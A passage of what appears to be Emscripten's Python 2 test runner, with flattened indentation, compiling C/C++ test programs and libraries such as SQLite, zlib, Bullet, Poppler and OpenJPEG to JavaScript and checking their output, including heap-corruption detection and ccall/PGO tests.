def test_mmap(self):
if self.emcc_args is None: return self.skip('requires emcc')
Settings.TOTAL_MEMORY = 128*1024*1024
src = '''
#include <stdio.h>
#include <sys/mman.h>
#include <assert.h>
int main(int argc, char *argv[]) {
for (int i = 0; i < 10; i++) {
int* map = (int*)mmap(0, 5000, PROT_READ | PROT_WRITE,
MAP_SHARED | MAP_ANON, -1, 0);
/* TODO: Should we align to 4k?
assert(((int)map) % 4096 == 0); // aligned
*/
assert(munmap(map, 5000) == 0);
}
const int NUM_BYTES = 8 * 1024 * 1024;
const int NUM_INTS = NUM_BYTES / sizeof(int);
int* map = (int*)mmap(0, NUM_BYTES, PROT_READ | PROT_WRITE,
MAP_SHARED | MAP_ANON, -1, 0);
assert(map != MAP_FAILED);
int i;
for (i = 0; i < NUM_INTS; i++) {
map[i] = i;
}
for (i = 0; i < NUM_INTS; i++) {
assert(map[i] == i);
}
assert(munmap(map, NUM_BYTES) == 0);
printf("hello,world");
return 0;
}
'''
self.do_run(src, 'hello,world')
self.do_run(src, 'hello,world', force_c=True)
def test_mmap_file(self):
if self.emcc_args is None: return self.skip('requires emcc')
self.emcc_args += ['--embed-file', 'data.dat']
open(self.in_dir('data.dat'), 'w').write('data from the file ' + ('.' * 9000))
src = r'''
#include <stdio.h>
#include <sys/mman.h>
int main() {
printf("*\n");
FILE *f = fopen("data.dat", "r");
char *m;
m = (char*)mmap(NULL, 9000, PROT_READ, MAP_PRIVATE, fileno(f), 0);
for (int i = 0; i < 20; i++) putchar(m[i]);
munmap(m, 9000);
printf("\n");
m = (char*)mmap(NULL, 9000, PROT_READ, MAP_PRIVATE, fileno(f), 5);
for (int i = 0; i < 20; i++) putchar(m[i]);
munmap(m, 9000);
printf("\n*\n");
return 0;
}
'''
self.do_run(src, '*\ndata from the file .\nfrom the file ......\n*\n')
def test_cubescript(self):
if self.emcc_args is None: return self.skip('requires emcc')
if self.run_name == 'o2':
self.emcc_args += ['--closure', '1'] # Use closure here for some additional coverage
Building.COMPILER_TEST_OPTS = filter(lambda x: x != '-g', Building.COMPILER_TEST_OPTS) # remove -g, so we have one test without it by default
if self.emcc_args is None: Settings.SAFE_HEAP = 0 # Has some actual loads of unwritten-to places, in the C++ code...
# Overflows happen in hash loop
Settings.CORRECT_OVERFLOWS = 1
Settings.CHECK_OVERFLOWS = 0
if Settings.USE_TYPED_ARRAYS == 2:
Settings.CORRECT_SIGNS = 1
self.do_run(path_from_root('tests', 'cubescript'), '*\nTemp is 33\n9\n5\nhello, everyone\n*', main_file='command.cpp')
assert 'asm2g' in test_modes
if self.run_name == 'asm2g':
results = {}
original = open('src.cpp.o.js').read()
results[Settings.ALIASING_FUNCTION_POINTERS] = len(original)
Settings.ALIASING_FUNCTION_POINTERS = 1 - Settings.ALIASING_FUNCTION_POINTERS
self.do_run(path_from_root('tests', 'cubescript'), '*\nTemp is 33\n9\n5\nhello, everyone\n*', main_file='command.cpp')
final = open('src.cpp.o.js').read()
results[Settings.ALIASING_FUNCTION_POINTERS] = len(final)
open('original.js', 'w').write(original)
print results
assert results[1] < 0.99*results[0]
assert ' & 3]()' in original, 'small function table exists'
assert ' & 3]()' not in final, 'small function table does not exist'
assert ' & 255]()' not in original, 'big function table does not exist'
assert ' & 255]()' in final, 'big function table exists'
def test_gcc_unmangler(self):
Settings.NAMED_GLOBALS = 1 # test coverage for this
Building.COMPILER_TEST_OPTS += ['-I' + path_from_root('third_party')]
self.do_run(open(path_from_root('third_party', 'gcc_demangler.c')).read(), '*d_demangle(char const*, int, unsigned int*)*', args=['_ZL10d_demanglePKciPj'])
#### Code snippet that is helpful to search for nonportable optimizations ####
#global LLVM_OPT_OPTS
#for opt in ['-aa-eval', '-adce', '-always-inline', '-argpromotion', '-basicaa', '-basiccg', '-block-placement', '-break-crit-edges', '-codegenprepare', '-constmerge', '-constprop', '-correlated-propagation', '-count-aa', '-dce', '-deadargelim', '-deadtypeelim', '-debug-aa', '-die', '-domfrontier', '-domtree', '-dse', '-extract-blocks', '-functionattrs', '-globaldce', '-globalopt', '-globalsmodref-aa', '-gvn', '-indvars', '-inline', '-insert-edge-profiling', '-insert-optimal-edge-profiling', '-instcombine', '-instcount', '-instnamer', '-internalize', '-intervals', '-ipconstprop', '-ipsccp', '-iv-users', '-jump-threading', '-lazy-value-info', '-lcssa', '-lda', '-libcall-aa', '-licm', '-lint', '-live-values', '-loop-deletion', '-loop-extract', '-loop-extract-single', '-loop-index-split', '-loop-reduce', '-loop-rotate', '-loop-unroll', '-loop-unswitch', '-loops', '-loopsimplify', '-loweratomic', '-lowerinvoke', '-lowersetjmp', '-lowerswitch', '-mem2reg', '-memcpyopt', '-memdep', '-mergefunc', '-mergereturn', '-module-debuginfo', '-no-aa', '-no-profile', '-partial-inliner', '-partialspecialization', '-pointertracking', '-postdomfrontier', '-postdomtree', '-preverify', '-prune-eh', '-reassociate', '-reg2mem', '-regions', '-scalar-evolution', '-scalarrepl', '-sccp', '-scev-aa', '-simplify-libcalls', '-simplify-libcalls-halfpowr', '-simplifycfg', '-sink', '-split-geps', '-sretpromotion', '-strip', '-strip-dead-debug-info', '-strip-dead-prototypes', '-strip-debug-declare', '-strip-nondebug', '-tailcallelim', '-tailduplicate', '-targetdata', '-tbaa']:
# LLVM_OPT_OPTS = [opt]
# try:
# self.do_run(path_from_root(['third_party']), '*d_demangle(char const*, int, unsigned int*)*', args=['_ZL10d_demanglePKciPj'], main_file='gcc_demangler.c')
# print opt, "ok"
# except:
# print opt, "FAIL"
def test_lua(self):
if self.emcc_args is None: return self.skip('requires emcc')
if Settings.QUANTUM_SIZE == 1: return self.skip('TODO: make this work')
self.do_run('',
'hello lua world!\n17\n1\n2\n3\n4\n7',
args=['-e', '''print("hello lua world!");print(17);for x = 1,4 do print(x) end;print(10-3)'''],
libraries=self.get_library('lua', [os.path.join('src', 'lua'), os.path.join('src', 'liblua.a')], make=['make', 'generic'], configure=None),
includes=[path_from_root('tests', 'lua')],
output_nicerizer=lambda string, err: (string + err).replace('\n\n', '\n').replace('\n\n', '\n'))
def get_freetype(self):
Settings.DEAD_FUNCTIONS += ['_inflateEnd', '_inflate', '_inflateReset', '_inflateInit2_']
return self.get_library('freetype',
os.path.join('objs', '.libs', 'libfreetype.a'))
def test_freetype(self):
if self.emcc_args is None: return self.skip('requires emcc')
if Settings.QUANTUM_SIZE == 1: return self.skip('TODO: Figure out and try to fix')
if Settings.ASM_JS and '-O2' not in self.emcc_args: return self.skip('mozilla bug 863867')
if Settings.CORRECT_SIGNS == 0: Settings.CORRECT_SIGNS = 1 # Not sure why, but needed
post = '''
def process(filename):
import tools.shared as shared
# Embed the font into the document
src = open(filename, 'r').read().replace(
'// {{PRE_RUN_ADDITIONS}}',
"FS.createDataFile('/', 'font.ttf', %s, true, false);" % str(
map(ord, open(shared.path_from_root('tests', 'freetype', 'LiberationSansBold.ttf'), 'rb').read())
)
)
open(filename, 'w').write(src)
'''
# Not needed for js, but useful for debugging
shutil.copyfile(path_from_root('tests', 'freetype', 'LiberationSansBold.ttf'), os.path.join(self.get_dir(), 'font.ttf'))
# Main
self.do_run(open(path_from_root('tests', 'freetype', 'main.c'), 'r').read(),
open(path_from_root('tests', 'freetype', 'ref.txt'), 'r').read(),
['font.ttf', 'test!', '150', '120', '25'],
libraries=self.get_freetype(),
includes=[path_from_root('tests', 'freetype', 'include')],
post_build=post)
#build_ll_hook=self.do_autodebug)
# github issue 324
print '[issue 324]'
self.do_run(open(path_from_root('tests', 'freetype', 'main_2.c'), 'r').read(),
open(path_from_root('tests', 'freetype', 'ref_2.txt'), 'r').read(),
['font.ttf', 'w', '32', '32', '25'],
libraries=self.get_freetype(),
includes=[path_from_root('tests', 'freetype', 'include')],
post_build=post)
print '[issue 324 case 2]'
self.do_run(open(path_from_root('tests', 'freetype', 'main_3.c'), 'r').read(),
open(path_from_root('tests', 'freetype', 'ref_3.txt'), 'r').read(),
['font.ttf', 'W', '32', '32', '0'],
libraries=self.get_freetype(),
includes=[path_from_root('tests', 'freetype', 'include')],
post_build=post)
print '[issue 324 case 3]'
self.do_run('',
open(path_from_root('tests', 'freetype', 'ref_4.txt'), 'r').read(),
['font.ttf', 'ea', '40', '32', '0'],
no_build=True)
def test_sqlite(self):
# gcc -O3 -I/home/alon/Dev/emscripten/tests/sqlite -ldl src.c
if self.emcc_args is None: return self.skip('Very slow without ta2, and we would also need to include dlmalloc manually without emcc')
if Settings.QUANTUM_SIZE == 1: return self.skip('TODO FIXME')
self.banned_js_engines = [NODE_JS] # OOM in older node
Settings.CORRECT_SIGNS = 1
Settings.CORRECT_OVERFLOWS = 0
Settings.CORRECT_ROUNDINGS = 0
if self.emcc_args is None: Settings.SAFE_HEAP = 0 # uses time.h to set random bytes, other stuff
Settings.DISABLE_EXCEPTION_CATCHING = 1
Settings.FAST_MEMORY = 4*1024*1024
Settings.EXPORTED_FUNCTIONS += ['_sqlite3_open', '_sqlite3_close', '_sqlite3_exec', '_sqlite3_free', '_callback'];
if Settings.ASM_JS == 1 and '-g' in self.emcc_args:
print "disabling inlining" # without registerize (which -g disables), we generate huge amounts of code
Settings.INLINING_LIMIT = 50
self.do_run(r'''
#define SQLITE_DISABLE_LFS
#define LONGDOUBLE_TYPE double
#define SQLITE_INT64_TYPE long long int
#define SQLITE_THREADSAFE 0
''' + open(path_from_root('tests', 'sqlite', 'sqlite3.c'), 'r').read() +
open(path_from_root('tests', 'sqlite', 'benchmark.c'), 'r').read(),
open(path_from_root('tests', 'sqlite', 'benchmark.txt'), 'r').read(),
includes=[path_from_root('tests', 'sqlite')],
force_c=True)
def test_zlib(self):
if not Settings.USE_TYPED_ARRAYS == 2: return self.skip('works in general, but cached build will be optimized and fail, so disable this')
if Settings.ASM_JS:
self.banned_js_engines = [NODE_JS] # TODO investigate
if self.emcc_args is not None and '-O2' in self.emcc_args and 'ASM_JS=0' not in self.emcc_args: # without asm, closure minifies Math.imul badly
self.emcc_args += ['--closure', '1'] # Use closure here for some additional coverage
Settings.CORRECT_SIGNS = 1
self.do_run(open(path_from_root('tests', 'zlib', 'example.c'), 'r').read(),
open(path_from_root('tests', 'zlib', 'ref.txt'), 'r').read(),
libraries=self.get_library('zlib', os.path.join('libz.a'), make_args=['libz.a']),
includes=[path_from_root('tests', 'zlib')],
force_c=True)
def test_the_bullet(self): # Called thus so it runs late in the alphabetical cycle... it is long
if self.emcc_args is None: return self.skip('requires emcc')
if Building.LLVM_OPTS and self.emcc_args is None: Settings.SAFE_HEAP = 0 # Optimizations make it so we do not have debug info on the line we need to ignore
Settings.DEAD_FUNCTIONS = ['__ZSt9terminatev']
# Note: this is also a good test of per-file and per-line changes (since we have multiple files, and correct specific lines)
if Settings.SAFE_HEAP:
# Ignore bitfield warnings
Settings.SAFE_HEAP = 3
Settings.SAFE_HEAP_LINES = ['btVoronoiSimplexSolver.h:40', 'btVoronoiSimplexSolver.h:41',
'btVoronoiSimplexSolver.h:42', 'btVoronoiSimplexSolver.h:43']
def test():
self.do_run(open(path_from_root('tests', 'bullet', 'Demos', 'HelloWorld', 'HelloWorld.cpp'), 'r').read(),
[open(path_from_root('tests', 'bullet', 'output.txt'), 'r').read(), # different roundings
open(path_from_root('tests', 'bullet', 'output2.txt'), 'r').read(),
open(path_from_root('tests', 'bullet', 'output3.txt'), 'r').read()],
libraries=self.get_library('bullet', [os.path.join('src', '.libs', 'libBulletDynamics.a'),
os.path.join('src', '.libs', 'libBulletCollision.a'),
os.path.join('src', '.libs', 'libLinearMath.a')],
configure_args=['--disable-demos','--disable-dependency-tracking']),
includes=[path_from_root('tests', 'bullet', 'src')])
test()
assert 'asm2g' in test_modes
if self.run_name == 'asm2g':
# Test forced alignment
print >> sys.stderr, 'testing FORCE_ALIGNED_MEMORY'
old = open('src.cpp.o.js').read()
Settings.FORCE_ALIGNED_MEMORY = 1
test()
new = open('src.cpp.o.js').read()
print len(old), len(new), old.count('tempBigInt'), new.count('tempBigInt')
assert len(old) > len(new)
assert old.count('tempBigInt') > new.count('tempBigInt')
def test_poppler(self):
if self.emcc_args is None: return self.skip('very slow, we only do this in emcc runs')
Settings.CORRECT_OVERFLOWS = 1
Settings.CORRECT_SIGNS = 1
Building.COMPILER_TEST_OPTS += [
'-I' + path_from_root('tests', 'freetype', 'include'),
'-I' + path_from_root('tests', 'poppler', 'include'),
]
Settings.INVOKE_RUN = 0 # We append code that does run() ourselves
# See post(), below
input_file = open(os.path.join(self.get_dir(), 'paper.pdf.js'), 'w')
input_file.write(str(map(ord, open(path_from_root('tests', 'poppler', 'paper.pdf'), 'rb').read())))
input_file.close()
post = '''
def process(filename):
# To avoid loading this large file to memory and altering it, we simply append to the end
src = open(filename, 'a')
src.write(
\'\'\'
FS.createDataFile('/', 'paper.pdf', eval(Module.read('paper.pdf.js')), true, false);
Module.callMain(Module.arguments);
Module.print("Data: " + JSON.stringify(FS.root.contents['filename-1.ppm'].contents.map(function(x) { return unSign(x, 8) })));
\'\'\'
)
src.close()
'''
#fontconfig = self.get_library('fontconfig', [os.path.join('src', '.libs', 'libfontconfig.a')]) # Used in file, but not needed, mostly
freetype = self.get_freetype()
poppler = self.get_library('poppler',
[os.path.join('utils', 'pdftoppm.o'),
os.path.join('utils', 'parseargs.o'),
os.path.join('poppler', '.libs', 'libpoppler.a')],
env_init={ 'FONTCONFIG_CFLAGS': ' ', 'FONTCONFIG_LIBS': ' ' },
configure_args=['--disable-libjpeg', '--disable-libpng', '--disable-poppler-qt', '--disable-poppler-qt4', '--disable-cms', '--disable-cairo-output', '--disable-abiword-output', '--enable-shared=no'])
# Combine libraries
combined = os.path.join(self.get_dir(), 'poppler-combined.bc')
Building.link(poppler + freetype, combined)
self.do_ll_run(combined,
map(ord, open(path_from_root('tests', 'poppler', 'ref.ppm'), 'r').read()).__str__().replace(' ', ''),
args='-scale-to 512 paper.pdf filename'.split(' '),
post_build=post)
#, build_ll_hook=self.do_autodebug)
def test_openjpeg(self):
if self.emcc_args is None: return self.skip('needs libc for getopt')
Building.COMPILER_TEST_OPTS = filter(lambda x: x != '-g', Building.COMPILER_TEST_OPTS) # remove -g, so we have one test without it by default
if Settings.USE_TYPED_ARRAYS == 2:
Settings.CORRECT_SIGNS = 1
else:
Settings.CORRECT_SIGNS = 2
Settings.CORRECT_SIGNS_LINES = ["mqc.c:566", "mqc.c:317"]
post = '''
def process(filename):
import tools.shared as shared
original_j2k = shared.path_from_root('tests', 'openjpeg', 'syntensity_lobby_s.j2k')
src = open(filename, 'r').read().replace(
'// {{PRE_RUN_ADDITIONS}}',
"FS.createDataFile('/', 'image.j2k', %s, true, false);" % shared.line_splitter(str(
map(ord, open(original_j2k, 'rb').read())
))
).replace(
'// {{POST_RUN_ADDITIONS}}',
"Module.print('Data: ' + JSON.stringify(FS.analyzePath('image.raw').object.contents));"
)
open(filename, 'w').write(src)
'''
shutil.copy(path_from_root('tests', 'openjpeg', 'opj_config.h'), self.get_dir())
lib = self.get_library('openjpeg',
[os.path.sep.join('codec/CMakeFiles/j2k_to_image.dir/index.c.o'.split('/')),
os.path.sep.join('codec/CMakeFiles/j2k_to_image.dir/convert.c.o'.split('/')),
os.path.sep.join('codec/CMakeFiles/j2k_to_image.dir/__/common/color.c.o'.split('/')),
os.path.join('bin', 'libopenjpeg.so.1.4.0')],
configure=['cmake', '.'],
#configure_args=['--enable-tiff=no', '--enable-jp3d=no', '--enable-png=no'],
make_args=[]) # no -j 2, since parallel builds can fail
# We use doubles in JS, so we get slightly different values than native code. So we
# check our output by comparing the average pixel difference
def image_compare(output, err):
# Get the image generated by JS, from the JSON.stringify'd array
m = re.search('\[[\d, -]*\]', output)
try:
js_data = eval(m.group(0))
except AttributeError:
print 'Failed to find proper image output in: ' + output
raise
js_data = map(lambda x: x if x >= 0 else 256+x, js_data) # Our output may be signed, so unsign it
# Get the correct output
true_data = open(path_from_root('tests', 'openjpeg', 'syntensity_lobby_s.raw'), 'rb').read()
# Compare them
assert(len(js_data) == len(true_data))
num = len(js_data)
diff_total = js_total = true_total = 0
for i in range(num):
js_total += js_data[i]
true_total += ord(true_data[i])
diff_total += abs(js_data[i] - ord(true_data[i]))
js_mean = js_total/float(num)
true_mean = true_total/float(num)
diff_mean = diff_total/float(num)
image_mean = 83.265
#print '[image stats:', js_mean, image_mean, true_mean, diff_mean, num, ']'
assert abs(js_mean - image_mean) < 0.01
assert abs(true_mean - image_mean) < 0.01
assert diff_mean < 0.01
return output
self.emcc_args += ['--minify', '0'] # to compare the versions
def do_test():
self.do_run(open(path_from_root('tests', 'openjpeg', 'codec', 'j2k_to_image.c'), 'r').read(),
'Successfully generated', # The real test for valid output is in image_compare
'-i image.j2k -o image.raw'.split(' '),
libraries=lib,
includes=[path_from_root('tests', 'openjpeg', 'libopenjpeg'),
path_from_root('tests', 'openjpeg', 'codec'),
path_from_root('tests', 'openjpeg', 'common'),
os.path.join(self.get_build_dir(), 'openjpeg')],
force_c=True,
post_build=post,
output_nicerizer=image_compare)#, build_ll_hook=self.do_autodebug)
do_test()
# some test coverage for EMCC_DEBUG 1 and 2
if self.emcc_args and '-O2' in self.emcc_args and 'EMCC_DEBUG' not in os.environ:
shutil.copyfile('src.c.o.js', 'release.js')
try:
os.environ['EMCC_DEBUG'] = '1'
print '2'
do_test()
shutil.copyfile('src.c.o.js', 'debug1.js')
os.environ['EMCC_DEBUG'] = '2'
print '3'
do_test()
shutil.copyfile('src.c.o.js', 'debug2.js')
finally:
del os.environ['EMCC_DEBUG']
for debug in [1,2]:
def clean(text):
return text.replace('\n\n', '\n').replace('\n\n', '\n').replace('\n\n', '\n').replace('\n\n', '\n').replace('\n\n', '\n').replace('{\n}', '{}')
self.assertIdentical(clean(open('release.js').read()), clean(open('debug%d.js' % debug).read())) # EMCC_DEBUG=1 mode must not generate different code!
print >> sys.stderr, 'debug check %d passed too' % debug
try:
os.environ['EMCC_FORCE_STDLIBS'] = '1'
print 'EMCC_FORCE_STDLIBS'
do_test()
finally:
del os.environ['EMCC_FORCE_STDLIBS']
print >> sys.stderr, 'EMCC_FORCE_STDLIBS ok'
try_delete(CANONICAL_TEMP_DIR)
else:
print >> sys.stderr, 'not doing debug check'
def test_python(self):
if self.emcc_args is None: return self.skip('requires emcc')
if Settings.QUANTUM_SIZE == 1: return self.skip('TODO: make this work')
if not self.is_le32(): return self.skip('fails on non-le32') # FIXME
#Settings.EXPORTED_FUNCTIONS += ['_PyRun_SimpleStringFlags'] # for the demo
if self.is_le32():
bitcode = path_from_root('tests', 'python', 'python.le32.bc')
else:
bitcode = path_from_root('tests', 'python', 'python.small.bc')
self.do_ll_run(bitcode,
'hello python world!\n[0, 2, 4, 6]\n5\n22\n5.470000',
args=['-S', '-c' '''print "hello python world!"; print [x*2 for x in range(4)]; t=2; print 10-3-t; print (lambda x: x*2)(11); print '%f' % 5.47'''])
def test_lifetime(self):
if self.emcc_args is None: return self.skip('test relies on emcc opts')
self.do_ll_run(path_from_root('tests', 'lifetime.ll'), 'hello, world!\n')
if '-O1' in self.emcc_args or '-O2' in self.emcc_args:
assert 'a18' not in open(os.path.join(self.get_dir(), 'src.cpp.o.js')).read(), 'lifetime stuff and their vars must be culled'
# Test cases in separate files. Note that these files may contain invalid .ll!
# They are only valid enough for us to read for test purposes, not for llvm-as
# to process.
def test_cases(self):
if Building.LLVM_OPTS: return self.skip("Our code is not exactly 'normal' llvm assembly")
try:
os.environ['EMCC_LEAVE_INPUTS_RAW'] = '1'
Settings.CHECK_OVERFLOWS = 0
for name in glob.glob(path_from_root('tests', 'cases', '*.ll')):
shortname = name.replace('.ll', '')
if '' not in shortname: continue
if '_ta2' in shortname and not Settings.USE_TYPED_ARRAYS == 2:
print self.skip('case "%s" only relevant for ta2' % shortname)
continue
if '_noasm' in shortname and Settings.ASM_JS:
print self.skip('case "%s" not relevant for asm.js' % shortname)
continue
print >> sys.stderr, "Testing case '%s'..." % shortname
output_file = path_from_root('tests', 'cases', shortname + '.txt')
if Settings.QUANTUM_SIZE == 1:
q1_output_file = path_from_root('tests', 'cases', shortname + '_q1.txt')
if os.path.exists(q1_output_file):
output_file = q1_output_file
if os.path.exists(output_file):
output = open(output_file, 'r').read()
else:
output = 'hello, world!'
if output.rstrip() != 'skip':
self.do_ll_run(path_from_root('tests', 'cases', name), output)
# Optional source checking, a python script that gets a global generated with the source
src_checker = path_from_root('tests', 'cases', shortname + '.py')
if os.path.exists(src_checker):
generated = open('src.cpp.o.js').read()
exec(open(src_checker).read())
finally:
del os.environ['EMCC_LEAVE_INPUTS_RAW']
def test_fuzz(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('needs ta2')
Building.COMPILER_TEST_OPTS += ['-I' + path_from_root('tests', 'fuzz')]
def run_all(x):
print x
for name in glob.glob(path_from_root('tests', 'fuzz', '*.c')):
print name
self.do_run(open(path_from_root('tests', 'fuzz', name)).read(),
open(path_from_root('tests', 'fuzz', name + '.txt')).read(), force_c=True)
run_all('normal')
self.emcc_args += ['--llvm-lto', '1']
run_all('lto')
# Autodebug the code
def do_autodebug(self, filename):
output = Popen([PYTHON, AUTODEBUGGER, filename+'.o.ll', filename+'.o.ll.ll'], stdout=PIPE, stderr=self.stderr_redirect).communicate()[0]
assert 'Success.' in output, output
self.prep_ll_run(filename, filename+'.o.ll.ll', force_recompile=True) # rebuild .bc # TODO: use code in do_autodebug_post for this
# Autodebug the code, after LLVM opts. Will only work once!
def do_autodebug_post(self, filename):
if not hasattr(self, 'post'):
print 'Asking for post re-call'
self.post = True
return True
print 'Autodebugging during post time'
delattr(self, 'post')
output = Popen([PYTHON, AUTODEBUGGER, filename+'.o.ll', filename+'.o.ll.ll'], stdout=PIPE, stderr=self.stderr_redirect).communicate()[0]
assert 'Success.' in output, output
shutil.copyfile(filename + '.o.ll.ll', filename + '.o.ll')
Building.llvm_as(filename)
Building.llvm_dis(filename)
def test_autodebug(self):
if Building.LLVM_OPTS: return self.skip('LLVM opts mess us up')
Building.COMPILER_TEST_OPTS += ['--llvm-opts', '0']
# Run a test that should work, generating some code
self.test_structs()
filename = os.path.join(self.get_dir(), 'src.cpp')
self.do_autodebug(filename)
# Compare to each other, and to expected output
self.do_ll_run(path_from_root('tests', filename+'.o.ll.ll'), '''AD:-1,1''')
assert open('stdout').read().startswith('AD:-1'), 'We must note when we enter functions'
# Test using build_ll_hook
src = '''
#include <stdio.h>
char cache[256], *next = cache;
int main()
{
cache[10] = 25;
next[20] = 51;
int x = cache[10];
double y = 11.52;
printf("*%d,%d,%.2f*\\n", x, cache[20], y);
return 0;
}
'''
self.do_run(src, '''AD:-1,1''', build_ll_hook=self.do_autodebug)
def test_corruption(self):
if Settings.ASM_JS: return self.skip('cannot use corruption checks in asm')
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('needs ta2 for actual test')
Settings.CORRUPTION_CHECK = 1
src = r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char **argv) {
int size = 1024*argc;
char *buffer = (char*)malloc(size);
#if CORRUPT
memset(buffer, argc, size+15);
#else
memset(buffer, argc, size);
#endif
for (int x = 0; x < size; x += argc*3) buffer[x] = x/3;
int ret = 0;
for (int x = 0; x < size; x++) ret += buffer[x];
free(buffer);
printf("All ok, %d\n", ret);
}
'''
for corrupt in [1]:
self.do_run(src.replace('CORRUPT', str(corrupt)), 'Heap corruption detected!' if corrupt else 'All ok, 4209')
def test_corruption_2(self):
if Settings.ASM_JS: return self.skip('cannot use corruption checks in asm')
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('needs ta2 for actual test')
Settings.SAFE_HEAP = 1
Settings.CORRUPTION_CHECK = 1
# test for free(0), malloc(0), etc.
src = r'''
#include <iostream>
#include <fstream>
#include <stdlib.h>
#include <stdio.h>
void bye() {
printf("all ok\n");
}
int main() {
atexit(bye);
std::string testPath = "/Script/WA-KA.txt";
std::fstream str(testPath.c_str(), std::ios::in | std::ios::binary);
if (str.is_open())
{
std::cout << "open!" << std::endl;
} else {
std::cout << "missing!" << std::endl;
}
return 1;
}
'''
self.do_run(src, 'missing!\nall ok\n')
def test_corruption_3(self):
if Settings.ASM_JS: return self.skip('cannot use corruption checks in asm')
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('needs ta2 for actual test')
Settings.CORRUPTION_CHECK = 1
# realloc
src = r'''
#include <stdlib.h>
#include <stdio.h>
#include <assert.h>
void bye() {
printf("all ok\n");
}
int main(int argc, char **argv) {
atexit(bye);
char *buffer = (char*)malloc(100);
for (int i = 0; i < 100; i++) buffer[i] = (i*i)%256;
buffer = (char*)realloc(buffer, argc + 50);
for (int i = 0; i < argc + 50; i++) {
//printf("%d : %d : %d : %d\n", i, (int)(buffer + i), buffer[i], (char)((i*i)%256));
assert(buffer[i] == (char)((i*i)%256));
}
return 1;
}
'''
self.do_run(src, 'all ok\n')
### Integration tests
def test_ccall(self):
if self.emcc_args is not None and '-O2' in self.emcc_args:
self.emcc_args += ['--closure', '1'] # Use closure here, to test we export things right
src = r'''
#include <stdio.h>
extern "C" {
int get_int() { return 5; }
float get_float() { return 3.14; }
char * get_string() { return "hello world"; }
void print_int(int x) { printf("%d\n", x); }
void print_float(float x) { printf("%.2f\n", x); }
void print_string(char *x) { printf("%s\n", x); }
int multi(int x, float y, int z, char *str) { if (x) puts(str); return (x+y)*z; }
int * pointer(int *in) { printf("%d\n", *in); static int ret = 21; return &ret; }
}
int main(int argc, char **argv) {
// keep them alive
if (argc == 10) return get_int();
if (argc == 11) return get_float();
if (argc == 12) return get_string()[0];
if (argc == 13) print_int(argv[0][0]);
if (argc == 14) print_float(argv[0][0]);
if (argc == 15) print_string(argv[0]);
if (argc == 16) pointer((int*)argv[0]);
if (argc % 17 == 12) return multi(argc, float(argc)/2, argc+1, argv[0]);
return 0;
}
'''
post = '''
def process(filename):
src = \'\'\'
var Module = {
'postRun': function() {
Module.print('*');
var ret;
ret = Module['ccall']('get_int', 'number'); Module.print([typeof ret, ret]);
ret = ccall('get_float', 'number'); Module.print([typeof ret, ret.toFixed(2)]);
ret = ccall('get_string', 'string'); Module.print([typeof ret, ret]);
ret = ccall('print_int', null, ['number'], [12]); Module.print(typeof ret);
ret = ccall('print_float', null, ['number'], [14.56]); Module.print(typeof ret);
ret = ccall('print_string', null, ['string'], ["cheez"]); Module.print(typeof ret);
ret = ccall('print_string', null, ['array'], [[97, 114, 114, 45, 97, 121, 0]]); Module.print(typeof ret);
ret = ccall('multi', 'number', ['number', 'number', 'number', 'string'], [2, 1.4, 3, 'more']); Module.print([typeof ret, ret]);
var p = ccall('malloc', 'pointer', ['number'], [4]);
setValue(p, 650, 'i32');
ret = ccall('pointer', 'pointer', ['pointer'], [p]); Module.print([typeof ret, getValue(ret, 'i32')]);
Module.print('*');
// part 2: cwrap
var multi = Module['cwrap']('multi', 'number', ['number', 'number', 'number', 'string']);
Module.print(multi(2, 1.4, 3, 'atr'));
Module.print(multi(8, 5.4, 4, 'bret'));
Module.print('*');
// part 3: avoid stack explosion
for (var i = 0; i < TOTAL_STACK/60; i++) {
ccall('multi', 'number', ['number', 'number', 'number', 'string'], [0, 0, 0, '123456789012345678901234567890123456789012345678901234567890']);
}
Module.print('stack is ok.');
}
};
\'\'\' + open(filename, 'r').read()
open(filename, 'w').write(src)
'''
Settings.EXPORTED_FUNCTIONS += ['_get_int', '_get_float', '_get_string', '_print_int', '_print_float', '_print_string', '_multi', '_pointer', '_malloc']
self.do_run(src, '*\nnumber,5\nnumber,3.14\nstring,hello world\n12\nundefined\n14.56\nundefined\ncheez\nundefined\narr-ay\nundefined\nmore\nnumber,10\n650\nnumber,21\n*\natr\n10\nbret\n53\n*\nstack is ok.\n', post_build=post)
def test_pgo(self):
if Settings.ASM_JS: return self.skip('PGO does not work in asm mode')
def run_all(name, src):
print name
def test(expected, args=[], no_build=False):
self.do_run(src, expected, args=args, no_build=no_build)
return open(self.in_dir('src.cpp.o.js')).read()
# Sanity check that it works and the dead function is emitted
js = test('*9*')
assert 'function _unused(' in js
# Run with PGO, see that unused is true to its name
Settings.PGO = 1
test("*9*\n-s DEAD_FUNCTIONS='[\"_unused\"]'")
Settings.PGO = 0
# Kill off the dead function, still works and it is not emitted
Settings.DEAD_FUNCTIONS = ['_unused']
js = test('*9*')
assert 'function _unused($' not in js # no compiled code
assert 'function _unused(' in js # lib-generated stub
Settings.DEAD_FUNCTIONS = []
# Run the same code with argc that uses the dead function, see abort
test(('missing function: unused'), args=['a', 'b'], no_build=True)
# Normal stuff
run_all('normal', r'''
#include <stdio.h>
extern "C" {
int used(int x) {
if (x == 0) return -1;
return used(x/3) + used(x/17) + x%5;
}
int unused(int x) {
if (x == 0) return -1;
return unused(x/4) + unused(x/23) + x%7;
}
}
int main(int argc, char **argv) {
printf("*%d*\n", argc == 3 ? unused(argv[0][0] + 1024) : used(argc + 1555));
return 0;
}
''')
# Call by function pointer
run_all('function pointers', r'''
#include <stdio.h>
extern "C" {
int used(int x) {
if (x == 0) return -1;
return used(x/3) + used(x/17) + x%5;
}
int unused(int x) {
if (x == 0) return -1;
return unused(x/4) + unused(x/23) + x%7;
}
}
typedef int (*ii)(int);
int main(int argc, char **argv) {
ii pointers[256];
for (int i = 0; i < 256; i++) {
pointers[i] = (i == 3) ? unused : used;
}
printf("*%d*\n", pointers[argc](argc + 1555));
return 0;
}
''')
def test_asm_pgo(self):
if not Settings.ASM_JS: return self.skip('this is a test for PGO for asm (NB: not *in* asm)')
src = open(path_from_root('tests', 'hello_libcxx.cpp')).read()
output = 'hello, world!'
self.do_run(src, output)
shutil.move(self.in_dir('src.cpp.o.js'), self.in_dir('normal.js'))
Settings.ASM_JS = 0
Settings.PGO = 1
self.do_run(src, output)
Settings.ASM_JS = 1
